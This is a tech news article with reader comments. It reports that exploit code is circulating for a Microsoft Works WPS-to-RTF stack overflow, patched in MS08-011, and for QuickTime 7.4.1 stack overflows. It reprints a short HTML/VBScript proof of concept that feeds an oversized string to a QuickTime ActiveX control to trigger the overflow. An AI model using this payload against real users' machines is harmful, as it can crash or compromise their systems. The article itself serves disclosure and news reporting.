Exploit code surfaces for Microsoft Works, QuickTime

Exploit code surfaces for Microsoft Works, QuickTime

Summary: Exploit code for Microsoft Works--which was just patched on Tuesday--and QuickTime is making the rounds.First up, the Microsoft Works exploit.

SHARE:

Exploit code for Microsoft Works--which was just patched on Tuesday--and QuickTime is making the rounds.

First up, the Microsoft Works exploit. A hacker dubbed "chujwamwdupe," who also makes Teletubbies references for giggles, posted the following:

A vulnerability exists in WPS to RTF convert filter that is part of Microsoft Office 2003. It could be exploited by remote attacker to take complete control of an affected system. This issue is due to stack overflow error in function that read secions from WPS file. When we change size of for example TEXT section to number langer than 0x10, stack overflow occurs - very easy to exploit.

The code is also available on Milw0rm. Microsoft had patched this issue with bulletin MS08-011 on Tuesday.

Meanwhile, Laurent Gaffié posted a proof of concept for multiple stack overflow vulnerabilities for QuickTime 7.4.1.

That code, also posted on Milw0rm, is as follows:

Proof of concept example [works with the others functions supplyed in section 2) ] : <html> <object classid='clsid:02BF25D5-8C17-4B23-BC80-D3488ABDDC6B' id='foo' ></object> <input type="button" value="Hit me" language="VBScript" OnClick="test()"> <script language="VBScript"> sub test() bar = String(515305, "A") foo.SetBgColor bar End Sub </script> </html>

Topics: Collaboration, Hardware, Microsoft, Mobility, Software

Kick off your day with ZDNet's daily email newsletter. It's the freshest tech news and opinion, served hot. Get it.

Talkback

6 comments
Log in or register to join the discussion
  • QuickTime just needs to die.

    No comment on Works, no experience, is it still used much? Reading the history of Zero Day though, it still amazes me that Apple has not been targeted with a class action lawsuit since it mandates the use of one the worst pieces of garbage (in security terms only, maybe it looks great and everyone loves it) software still in use today with it's iPod ecosystem.

    What's this, number 70 (as of Sept 2007, there were a total of 61 critical exploit vectors into the OS via QuickTime), so assuming the current rate of ~3 critical vulnerabilities per month...

    TripleII

    No I am not anti-Apple, or Anti-iPod or whatever, just Anti-QuickTime.
    TripleII-21189418044173169409978279405827
    • No need to die

      It just needs to be re-written from scratch. It's a swiss-cheese piece of code.
      frgough
      • That's what I mean. :D

        You are right. They can fork a BSD media player and make it look/feel/operate transparently as the current QuickTime in probably very little time.

        The QuickTime name doesn't need to die, just current incarnation.

        TripleII
        TripleII-21189418044173169409978279405827
        • Full Screen

          At least they don't try to make you pay to watch videos in fullscreen anymore. That was the worst part about it.
          gtg781w
  • Microsoft works and Quicktime

    Who even uses Microsoft works. I try to avoid quick time for Windows too, whenever possible. Both terrible programs that need to be killed.
    gtg781w
  • Works

    I do and recommend it to others... Why??.. be cause it is inexpensive, adaptable to many tasks and easy to teach (or learn) to others.. Sleep well ...puppadave
    puppadave